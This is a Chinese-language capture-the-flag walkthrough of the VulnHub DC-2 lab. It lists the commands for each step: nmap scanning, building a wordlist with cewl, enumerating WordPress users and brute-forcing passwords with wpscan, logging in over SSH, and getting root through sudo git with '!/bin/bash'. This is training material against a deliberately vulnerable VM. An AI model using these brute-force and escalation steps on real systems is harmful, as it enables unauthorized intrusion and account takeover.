其他分享
首页 > 其他分享> > DC-2

DC-2

作者:互联网

环境搭建

下载地址:

https://download.vulnhub.com/dc/DC-2.zip.torrent

从描述中得知有5个flag。
下载好后导入虚拟机
image
修改网络配置为NAT
image

探测靶机

nmap扫描一波

nmap -sP 192.168.164.0/24

image
确认靶机IP为192.168.164.179
提示要修改host文件
image
image
成功访问
image
使用nmap扫描开放的端口

nmap -A -sS -sV -v -p- 192.168.164.179

开启了80和7744端口
image

挖掘信息

该网站有一个flag界面,点开查看提示
image
第一可能需要用cewl爬虫收集网站信息,第二这是一个wordpress网站。
image
根据flag1的提示使用命令:

cewl http://dc-2/ -w 1.txt

image

爆破登录端口

由于知道这是一个wordpress的cms搭建的网站,使用wpscan扫描一波,枚举一下用户名

wpscan --url http://dc-2/ -eu

得到3个用户名
image
将获得的用户名保存到2.txt文件中
开始用wpscan启动爆破功能最后跑出几个账号出来

wpscan -–url http://dc-2/ -U 2.txt -P 1.txt

获得两个用户名的密码
image
登录后台
image
使用jerry登录后发现flag2
image
image

登录SSH端口

尝试用得到的账号连接ssh
jerry连接失败
image
tom连接成功
image
权限太少,无论输入啥都是-rbash:
image
成功解决此问题
image
ls查看当前目录,存在flag3.txt,直接读取
image
返回/home目录下进入jerry目录下,发现flag4.txt,直接读取
image

提权

tom无权限
image
切换成jerry可以找点东西
可以以root权限运行/usr/bin/git文件
image

sudo git help config
	!/bin/bash或者!'sh'完成提权

sudo git  -p help
	!/bin/bash

image
到root目录下获得最终flag
image

标签:用户名,nmap,jerry,dc,DC,wpscan,txt
来源: https://www.cnblogs.com/zhaohzaomumu/p/15322277.html